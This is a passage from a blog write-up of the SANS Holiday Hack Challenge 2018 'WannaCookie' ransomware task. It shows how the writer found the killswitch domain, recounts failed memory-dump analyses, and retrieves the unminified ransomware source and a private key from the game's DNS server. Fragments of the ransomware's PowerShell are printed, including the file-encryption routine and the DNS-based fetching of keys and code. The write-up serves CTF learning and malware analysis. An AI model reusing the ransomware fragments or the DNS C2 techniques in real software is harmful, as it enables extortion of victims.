&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2A&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;ti_rox&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;G2B&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2B&lt;/span&gt; &lt;span class="nv"&gt;$S1&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="n"&gt;6B696C6C737769746368&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Strings&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;
&lt;span class="go"&gt;yippeekiyaa.aaay&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The killswitch domain seems to be &lt;code&gt;yippeekiyaa.aaay&lt;/code&gt;. Let's register it
on &lt;a class="reference external" href="https://hohohodaddy.kringlecastle.com/index.html"&gt;HoHoHo Daddy&lt;/a&gt;:&lt;/p&gt;
&lt;img alt="hohoho_daddy_success.png" class="align-center" src="/images/sans-christmas-challenge-2018/hohoho_daddy_success.png" /&gt;
&lt;p&gt;Alright! We stopped the malware. We can now feel like &amp;#64;MalwareTechBlog. You
know, without the federal investigation and stuff... Anyway! The sentence is
&lt;code&gt;Successfully registered yippeekiyaa.aaay!&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="memory-dump-analysis"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id43"&gt;Memory Dump Analysis&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Alabaster needs us to decrypt his password database, that was encrypted by the
WannaCookie ransomware.&lt;/p&gt;
&lt;img alt="alabaster.png" class="align-center" src="/images/sans-christmas-challenge-2018/alabaster.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Yippee-Ki-Yay! Now, I have a ma... kill-switch!&lt;/p&gt;
&lt;p&gt;Now that we don't have to worry about new infections, I could sure use your
L337 security skills for one last thing.&lt;/p&gt;
&lt;p&gt;As I mentioned, I made the mistake of analyzing the malware on my host
computer and the ransomware encrypted my password database.&lt;/p&gt;
&lt;p&gt;Take this &lt;a class="reference external" href="https://www.holidayhackchallenge.com/2018/challenges/forensic_artifacts.zip"&gt;zip&lt;/a&gt;
with a memory dump and my encrypted password database, and see if you can
recover my passwords.&lt;/p&gt;
&lt;p&gt;One of the passwords will unlock our access to the vault so we can get in
before the hackers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Alright, a lot is happening. Here's what we can see from the source code:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;The function &lt;code&gt;e_d_file&lt;/code&gt; takes a key, a file, and a boolean. If the
boolean is true, the file is encrypted using AES in CBC mode. If the boolean
is false, the file is decrypted using the same algorithm.&lt;/li&gt;
&lt;li&gt;&lt;dl class="first docutils"&gt;
&lt;dt&gt;Some helper functions are defined:&lt;/dt&gt;
&lt;dd&gt;&lt;ul class="first last"&gt;
&lt;li&gt;&lt;code&gt;H2B&lt;/code&gt;, &lt;code&gt;B2H&lt;/code&gt;: convert data from/to hexadecimal strings
to/from binary objects.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;H2A&lt;/code&gt;, &lt;code&gt;A2H&lt;/code&gt;: convert data from/to hexadecimal strings
to/from byte arrays.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;G2B&lt;/code&gt;, &lt;code&gt;B2G&lt;/code&gt;: convert data from/to compressed data to/from
binary objects.&lt;/li&gt;
&lt;/ul&gt;
&lt;/dd&gt;
&lt;/dl&gt;
&lt;/li&gt;
&lt;li&gt;The function &lt;code&gt;ti_rox&lt;/code&gt; seems to XOR two variables.&lt;/li&gt;
&lt;li&gt;The function &lt;code&gt;sh1&lt;/code&gt; is just a wrapper to the SHA1 hashing function.&lt;/li&gt;
&lt;li&gt;The function &lt;code&gt;p_k_e&lt;/code&gt; encrypts a variable using a public key.&lt;/li&gt;
&lt;li&gt;The function &lt;code&gt;e_n_d&lt;/code&gt; encrypts/decrypts a list of files using an AES
key (by calling the &lt;code&gt;e_d_file&lt;/code&gt; function).&lt;/li&gt;
&lt;li&gt;The function &lt;code&gt;g_o_dns&lt;/code&gt; seems to recover some data from the
&lt;code&gt;erohetfanu.com&lt;/code&gt; DNS server.&lt;/li&gt;
&lt;li&gt;The function &lt;code&gt;s_2_c&lt;/code&gt; splits a string into chunks.&lt;/li&gt;
&lt;li&gt;The function &lt;code&gt;snd_k&lt;/code&gt; sends, chunk by chunk, a string to the
&lt;code&gt;erohetfanu.com&lt;/code&gt; DNS server.&lt;/li&gt;
&lt;li&gt;Finally, the function &lt;code&gt;wanc&lt;/code&gt; is the main function.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let's analyze how the malware works, so that we can find a way to decrypt
Alabaster's passwords. Here's what &lt;code&gt;wanc&lt;/code&gt; does:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;It first checks the killswitch domain, whether the malware is already
running, and if it's running on the intended target.&lt;/li&gt;
&lt;li&gt;It then recovers what seems to be a public key, &lt;code&gt;$p_k&lt;/code&gt;, from the DNS
server, with the following command: &lt;code&gt;g_o_dns(&amp;quot;7365727665722E637274&amp;quot;)&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;It then generates an AES key, &lt;code&gt;$b_k&lt;/code&gt;, using two arrays of bytes from
1 to 255 (no zero), and the function &lt;code&gt;Get-Random&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The key is hex-encoded in &lt;code&gt;$h_k&lt;/code&gt;, which is then hashed using SHA1 and
stored in &lt;code&gt;$k_h&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The AES key &lt;code&gt;$b_k&lt;/code&gt; is encrypted using the public key &lt;code&gt;$p_k&lt;/code&gt;. The
result is stored in &lt;code&gt;$p_k_e_k&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The encrypted key, &lt;code&gt;$p_k_e_k&lt;/code&gt; is sent to the DNS server, which gives
a victim id, &lt;code&gt;$c_id&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The current date in UTC is stored in &lt;code&gt;$d_t&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;A list of all &lt;code&gt;*.elfdb&lt;/code&gt; files is generated, and then encrypted using
&lt;code&gt;$b_k&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The variables &lt;code&gt;$b_k&lt;/code&gt; and &lt;code&gt;$h_k&lt;/code&gt; are cleared using
&lt;code&gt;Clear-Variable&lt;/code&gt;. (The variable &lt;code&gt;$key&lt;/code&gt;, which holds the value of
&lt;code&gt;$b_k&lt;/code&gt; in &lt;code&gt;e_d_file&lt;/code&gt; is also cleared).&lt;/li&gt;
&lt;li&gt;The malware sets up an HTTP listener on &lt;code&gt;127.0.0.1:8080&lt;/code&gt;, which
displays an HTML ransom message, downloaded from the DNS server, using the
code &lt;code&gt;g_o_dns (A2H &amp;quot;source.min.html&amp;quot;)&lt;/code&gt;. The HTTP listener handles
decryption requests: when the victim pays the ransom, the decryption key is
given to them. They can then enter them in the HTTP listener, which will
compare this key's SHA1 sum to the one it has in memory in the variable
&lt;code&gt;$k_h&lt;/code&gt;. If they match, the files are decrypted.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="section" id="id3"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id44"&gt;All the dead ends, yay!&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Alright, knowing this, how can we try and recover Alabaster's passwords? Here's
a list of the things that I tried and that &lt;strong&gt;don't work&lt;/strong&gt;, but still took a
whole lot of time to test (and then had the audacity of &lt;strong&gt;not being the right
solutions, damn them!&lt;/strong&gt;). Again, if you just directly want the right solution,
you can &lt;a class="reference external" href="#id4"&gt;jump to it&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I first thought that maybe the keys weren't correctly cleared in the memory
dump and that I could recover them, using tools such as &lt;code&gt;aes-finder&lt;/code&gt;,
&lt;code&gt;aeskeyfind&lt;/code&gt;, &lt;code&gt;findaes&lt;/code&gt;, etc. But these tools did not find
anything.&lt;/p&gt;
&lt;p&gt;I then thought that maybe the &lt;a class="reference external" href="https://tools.kali.org/forensics/volatility"&gt;Volatility framework&lt;/a&gt; could help. But it doesn't
support the Mini DuMP format used in the dump. So, another deadend.&lt;/p&gt;
&lt;p&gt;I then thought thay maybe the password file or the encryption key could be
found in cleartext using &lt;code&gt;binwalk&lt;/code&gt;. But it only returned what I think
were many false-positives, and no password file or encryption key.&lt;/p&gt;
&lt;p&gt;On to my next deadend, which stole most of my time. It's common for ransomware
to generate weak encryption keys, because of unproper random initialization.
Here's an &lt;a class="reference external" href="https://blog.malwarebytes.com/threat-analysis/2018/03/encryption-101-how-to-break-encryption/"&gt;example&lt;/a&gt;.
If you remember, the malware generates the AES key using the PowerShell
function &lt;code&gt;Get-Random&lt;/code&gt;, without any seed. I did a little research on this
function, and found some &lt;a class="reference external" href="https://www.reddit.com/r/Iota/comments/6v9mj6/psa_nearly_all_powershell_generated_seeds_are/"&gt;resources online&lt;/a&gt;
that suggested that maybe the randomness produced by &lt;code&gt;Get-Random&lt;/code&gt; was
not cryptographically-secure. I then read &lt;a class="reference external" href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/get-random?view=powershell-6"&gt;Microsoft's documentation of the
function&lt;/a&gt;,
which states (emphasis mine):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;-SetSeed&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Specifies a seed value for the random number generator. This seed value is
used for the current command and for all subsequent Get-Random commands in
the current session until you use SetSeed again or close the session. You
cannot reset the seed to its default, clock-based value.&lt;/p&gt;
&lt;p&gt;The SetSeed parameter is not required. &lt;strong&gt;By default, Get-Random uses the
system clock to generate a seed value&lt;/strong&gt;. Because SetSeed results in
non-random behavior, it is typically used only when trying to reproduce
behavior, such as when debugging or analyzing a script that includes
Get-Random commands.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I thought I had my ticket with this. I thought that if I found at what time the
ransomware was launched, I could use this time as a seed to regenerate the
encryption key. Luckily, we have several ways to find around which time the
ransomware was launched. First, it's in the metadata of the dump file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; file powershell.exe_181109_104716.dmp
&lt;span class="go"&gt;powershell.exe_181109_104716.dmp: Mini DuMP crash report, 19 streams, Fri Nov  9 15:47:39 2018, 0x61826 type&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, if you remember, the current date was stored in a variable &lt;code&gt;$d_t&lt;/code&gt;
in the ransomware. This date was displayed in the HTML listener, next to the
payment status:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -a UNPAID powershell.exe_181109_104716.dmp
&lt;span class="go"&gt;�B_��RE_��_E_ ����OUNPAID|               4739626449686a334d36|Friday, November 09, 2018 3:25:34 PM&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, the ransomware was launched on Friday, November 09, 2018, around 3:00 PM.
Now that I knew the time of launch, I could try to regenerate the AES key
using &lt;code&gt;Get-Random&lt;/code&gt;. Or so I thought... No matther how I initialized the
key, I wasn't able to obtain reproductible results using &lt;code&gt;Get-Random&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I then saw online that maybe &lt;code&gt;Get-Random&lt;/code&gt; is not seeded with the system
date, but with the system uptime, using &lt;code&gt;TickCounts&lt;/code&gt;. But there again, I
wasn't able to obtain reproductible results. I did some more digging, and
&lt;a class="reference external" href="https://stackoverflow.com/questions/45135091/what-prng-does-get-random-in-powershell-5-1-use"&gt;several&lt;/a&gt;
StackOverflow &lt;a class="reference external" href="https://stackoverflow.com/questions/34331541/what-is-the-default-seed-for-powershell-get-random-cmdlet"&gt;posts&lt;/a&gt;
indicated that the seed initialization is trickier that I thought. As suggested
by one of these posts, I took a look at PowerShell's source code on &lt;a class="reference external" href="https://github.com/PowerShell/PowerShell/blob/master/src/Microsoft.PowerShell.Commands.Utility/commands/utility/GetRandomCommand.cs"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;There, you can see that if you initialize the seed using &lt;code&gt;-SetSeed&lt;/code&gt;, you
can see that the random generator used is &lt;code&gt;System.Random&lt;/code&gt;. If you don't
initialize the seed, the random generator used is
&lt;code&gt;System.Security.Cryptography.RandomNumberGenerator&lt;/code&gt;. However, &lt;a class="reference external" href="https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=netframework-4.7.2"&gt;this
function&lt;/a&gt;
does not seem to have any weakness in its seed initialization process.&lt;/p&gt;
&lt;p&gt;After having wasted three days on this track, I gave up and asked for my
coworkers' help. While most of them were busy and made me understand in
colorful phrasing that they didn't have the time to help me, one of them,
&lt;a class="reference external" href="https://github.com/imaibou"&gt;imaibou&lt;/a&gt;, had some time to take a look.&lt;/p&gt;
&lt;p&gt;He ran a deweaponized version of the ransomware (where the encryption was
commented out) and then produced a dump of the PowerShell process. He then
mentioned to me that he was able to find out his AES key (that he had printed
out) in the memory dump of his process. Ha! I was right from the start: the
key is not properly cleared from the memory. Or so I thought, yet again...
We tried searching for the keys in Alabater's memory dump in every imaginable
format:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;In raw hexadecimal (&lt;code&gt;\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;In UTF16-LE encoded hexadecimal (&lt;code&gt;\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00\xXX\x00&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;In printable hex representation (&lt;code&gt;XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;In UTF16-LE encoded printable hex representation (&lt;code&gt;XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00XX\x00&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;In oh-so-many other formats...&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But no luck. Even though we managed to find our key in our home-made memory
dump, we couldn't find the key in Alabaster's dump. Even our boss, Christophe,
took time out of his schedule to lend a hand. but even his security super
powers didn't manage to take us out of this slump.&lt;/p&gt;
&lt;p&gt;Out of ideas, ashamed, and tired, we went and looked at the hints for this
question. Here's what we were given:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;wannacookie.min.ps1&lt;/code&gt;? I wonder if there is a non-minified version?
If so, it may be easier to read and give us more information and maybe
source comments?&lt;/p&gt;
&lt;p&gt;Whoa, &lt;a class="reference external" href="http://www.youtube.com/watch?v=wd12XRq2DNk"&gt;Chris Davis' talk&lt;/a&gt; on
PowerShell malware is crazy pants! You should check it out!&lt;/p&gt;
&lt;p&gt;Pulling strings from a memory dump using the linux &lt;code&gt;strings&lt;/code&gt; command
requires you specify the &lt;code&gt;-e&lt;/code&gt; option with the specific format
required by the OS and processor. Of course, you could also use
&lt;a class="reference external" href="https://github.com/chrisjd20/power_dump"&gt;powerdump&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I didn't understand the reference to &lt;code&gt;wannacookie.min.ps1&lt;/code&gt;, since I
hadn't seen this filename anywhere (but more on that later).&lt;/p&gt;
&lt;p&gt;I then felt stupid: I had forgotten that KringleCon is initially a security
conference. I then proceeded to watch Chris Davis' talk on PowerShell malware
memory analysis, where he presents his tool &lt;code&gt;power_dump&lt;/code&gt;, which can be
used to analyze memory dump of PowerShell processes, and extract variables.&lt;/p&gt;
&lt;p&gt;I loaded up &lt;code&gt;power_dump&lt;/code&gt;, sighing that I finally will be able to answer
this question. I used the tool to search for 32-byte long hexadecimal
representation:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;================ Filters ================
1| MATCHES  bool(re.search(r&amp;quot;^[0-9a-fA-F]+$&amp;quot;,variable_values))
2| LENGTH  len(variable_values) == 32

[i] 5 powershell Variable Values found!
============== Search/Dump PS Variable Values ===================================
COMMAND        |     ARGUMENT                | Explanation
===============|=============================|=================================
print          | print [all|num]             | print specific or all Variables
dump           | dump [all|num]              | dump specific or all Variables
contains       | contains [ascii_string]     | Variable Values must contain string
matches        | matches &amp;quot;[python_regex]&amp;quot;    | match python regex inside quotes
len            | len [&amp;gt;|&amp;lt;|&amp;gt;=|&amp;lt;=|==] [bt_size]| Variables length &amp;gt;,&amp;lt;,=,&amp;gt;=,&amp;lt;= size
clear          | clear [all|num]             | clear all or specific filter num
===============================================================================
: print all
&lt;span class="hll"&gt;033ecb2bc07a4d43b5ef94ed5a35d280
&lt;/span&gt;Variable Values #1 above ^
Type any key to go back and just Enter to Continue...
&lt;span class="hll"&gt;cf522b78d86c486691226b40aa69e95c
&lt;/span&gt;Variable Values #2 above ^
Type any key to go back and just Enter to Continue...
&lt;span class="hll"&gt;9e210fe47d09416682b841769c78b8a3
&lt;/span&gt;Variable Values #3 above ^
Type any key to go back and just Enter to Continue...
&lt;span class="hll"&gt;4ec4f0187cb04f4cb6973460dfe252df
&lt;/span&gt;Variable Values #4 above ^
Type any key to go back and just Enter to Continue...
&lt;span class="hll"&gt;27c87ef9bbda4f709f6b4002fa4af63c
&lt;/span&gt;Variable Values #5 above ^
Type any key to go back and just Enter to Continue...
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&amp;quot;Huh&amp;quot;, I thought, &amp;quot;these keys look familiar&amp;quot;. That's because I had already
found them in the memory dump using &lt;code&gt;strings&lt;/code&gt;! And I know that they're
not the correct keys!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id4"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id45"&gt;The right solution&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Despair fell on me again. Now I was freshly out of ideas, again! I then turned
to my last resort: the KringleCon chat. People told me that maybe I shouldn't
try to look directly for the key in memory, but to another form. I also noticed
that people were talking a lot about public/private key encryption.&lt;/p&gt;
&lt;p&gt;And then it clicked: I should look for the encrypted key in memory, that is
the value of the &lt;code&gt;$p_k_e_k&lt;/code&gt; variable. But even if I find this value, how
will I decrypt it without the private key? My colleague &lt;a class="reference external" href="https://github.com/imaibou"&gt;imaibou&lt;/a&gt; mentioned that he tried to factor the public
key using &lt;a class="reference external" href="https://eprint.iacr.org/2015/398.pdf"&gt;weak factors&lt;/a&gt;, but to no
avail. I saw in the KringleCon chat that some people had managed to find the
ransomware's private key.&lt;/p&gt;
&lt;p&gt;And then it cliked again! I thought back to the first hint, the one I didn't
understand, talking about &lt;code&gt;wannacookie.min.ps1&lt;/code&gt;. Remember the hash we
used for our Snort rule? Its value is
&lt;code&gt;77616E6E61636F6F6B69652E6D696E2E707331&lt;/code&gt;. What happens if we decode this
hex value?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; 77616E6E61636F6F6B69652E6D696E2E707331 &lt;span class="p"&gt;|&lt;/span&gt; xxd -r -p
&lt;span class="go"&gt;wannacookie.min.ps1&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can encode some file names in hexadecimal, and then download them from the
DNS server, using the &lt;code&gt;g_o_dns&lt;/code&gt; PowerShell function. For example, let's
try to download an unminified version of the malware. We can kind of guess
that the filename will be &lt;code&gt;wannacookie.ps1&lt;/code&gt;. Let's encode this, and
download it with &lt;code&gt;g_o_dns&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; -n wannacookie.ps1 &lt;span class="p"&gt;|&lt;/span&gt; xxd -p
&lt;span class="go"&gt;77616e6e61636f6f6b69652e707331&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;g_o_dns&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;77616e6e61636f6f6b69652e707331&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;wannacookie&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ps1&lt;/span&gt;
&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="nb"&gt;Get-Content&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;wannacookie&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ps1&lt;/span&gt;
&lt;span class="go"&gt;$functions = {&lt;/span&gt;
&lt;span class="go"&gt;    function Enc_Dec-File($key, $File, $enc_it) {&lt;/span&gt;
&lt;span class="go"&gt;        [byte[]]$key = $key&lt;/span&gt;
&lt;span class="go"&gt;        $Suffix = &amp;quot;`.wannacookie&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;        [System.Reflection.Assembly]::LoadWithPartialName(&amp;#39;System.Security.Cryptography&amp;#39;)&lt;/span&gt;
&lt;span class="go"&gt;        [System.Int32]$KeySize = $key.Length*8&lt;/span&gt;
&lt;span class="go"&gt;        $AESP = New-Object &amp;#39;System.Security.Cryptography.AesManaged&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;span class="go"&gt;function wannacookie {&lt;/span&gt;
&lt;span class="go"&gt;    $S1 = &amp;quot;1f8b080000000000040093e76762129765e2e1e6640f6361e7e202000cdd5c5c10000000&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;    if ($null -ne ((Resolve-DnsName -Name $(H2A $(B2H $(ti_rox $(B2H $(G2B $(H2B $S1))) $(Resolve-DnsName -Server erohetfanu.com -Name 6B696C6C737769746368.erohetfanu.com -Type TXT).Strings))).ToString() -ErrorAction 0 -Server 8.8.8.8))) {return}&lt;/span&gt;
&lt;span class="go"&gt;    if ($(netstat -ano | Select-String &amp;quot;127.0.0.1:8080&amp;quot;).length -ne 0 -or (Get-WmiObject Win32_ComputerSystem).Domain -ne &amp;quot;KRINGLECASTLE&amp;quot;) {return}&lt;/span&gt;
&lt;span class="go"&gt;    $pub_key = [System.Convert]::FromBase64String($(get_over_dns(&amp;quot;7365727665722E637274&amp;quot;) ) )&lt;/span&gt;
&lt;span class="go"&gt;    $Byte_key = ([System.Text.Encoding]::Unicode.GetBytes($(([char[]]([char]01..[char]255) + ([char[]]([char]01..[char]255)) + 0..9 | sort {Get-Random})[0..15] -join &amp;#39;&amp;#39;))  | ? {$_ -ne 0x00})&lt;/span&gt;
&lt;span class="go"&gt;    $Hex_key = $(B2H $Byte_key)&lt;/span&gt;
&lt;span class="go"&gt;    $Key_Hash = $(Sha1 $Hex_key)&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Awesome, we can download file from the DNS server. Now, let's go back to the
malware's source code. How did it download the public key?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nv"&gt;$p_k&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.Convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;FromBase64String&lt;/span&gt;&lt;span class="p"&gt;($(&lt;/span&gt;&lt;span class="n"&gt;g_o_dns&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;7365727665722E637274&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's decode the &lt;code&gt;7365727665722E637274&lt;/code&gt; string:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; 7365727665722E637274 &lt;span class="p"&gt;|&lt;/span&gt; xxd -p -r
&lt;span class="go"&gt;server.crt&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, apparently, the public key was in a file called &lt;code&gt;server.crt&lt;/code&gt;. What's
the name of the file containing the private key? Let's try something simple,
such as &lt;code&gt;server.key&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; -n server.key &lt;span class="p"&gt;|&lt;/span&gt; xxd -p
&lt;span class="go"&gt;7365727665722e6b6579&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;g_o_dns&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;7365727665722e6b6579&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="go"&gt;-----BEGIN PRIVATE KEY-----&lt;/span&gt;
&lt;span class="go"&gt;MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDEiNzZVUbXCbMG&lt;/span&gt;
&lt;span class="go"&gt;L4sM2UtilR4seEZli2CMoDJ73qHql+tSpwtK9y4L6znLDLWSA6uvH+lmHhhep9ui&lt;/span&gt;
&lt;span class="go"&gt;W3vvHYCq+Ma5EljBrvwQy0e2Cr/qeNBrdMtQs9KkxMJAz0fRJYXvtWANFJF5A+Nq&lt;/span&gt;
&lt;span class="go"&gt;jI+jdMVtL8+PVOGWp1PA8DSW7i+9eLkqPbNDxCfFhAGGlHEU+cH0CTob0SB5Hk0S&lt;/span&gt;
&lt;span class="go"&gt;TPUKKJVc3fsD8/t60yJThCw4GKkRwG8vqcQCgAGVQeLNYJMEFv0+WHAt2WxjWTu3&lt;/span&gt;
&lt;span class="go"&gt;HnAfMPsiEnk/y12SwHOCtaNjFR8Gt512D7idFVW4p5sT0mrrMiYJ+7x6VeMIkrw4&lt;/span&gt;
&lt;span class="go"&gt;tk/1ZlYNAgMBAAECggEAHdIGcJOX5Bj8qPudxZ1S6uplYan+RHoZdDz6bAEj4Eyc&lt;/span&gt;
&lt;span class="go"&gt;0DW4aO+IdRaD9mM/SaB09GWLLIt0dyhRExl+fJGlbEvDG2HFRd4fMQ0nHGAVLqaW&lt;/span&gt;
&lt;span class="go"&gt;OTfHgb9HPuj78ImDBCEFaZHDuThdulb0sr4RLWQScLbIb58Ze5p4AtZvpFcPt1fN&lt;/span&gt;
&lt;span class="go"&gt;6YqS/y0i5VEFROWuldMbEJN1x+xeiJp8uIs5KoL9KH1njZcEgZVQpLXzrsjKr67U&lt;/span&gt;
&lt;span class="go"&gt;3nYMKDemGjHanYVkF1pzv/rardUnS8h6q6JGyzV91PpLE2I0LY+tGopKmuTUzVOm&lt;/span&gt;
&lt;span class="go"&gt;Vf7sl5LMwEss1g3x8gOh215Ops9Y9zhSfJhzBktYAQKBgQDl+w+KfSb3qZREVvs9&lt;/span&gt;
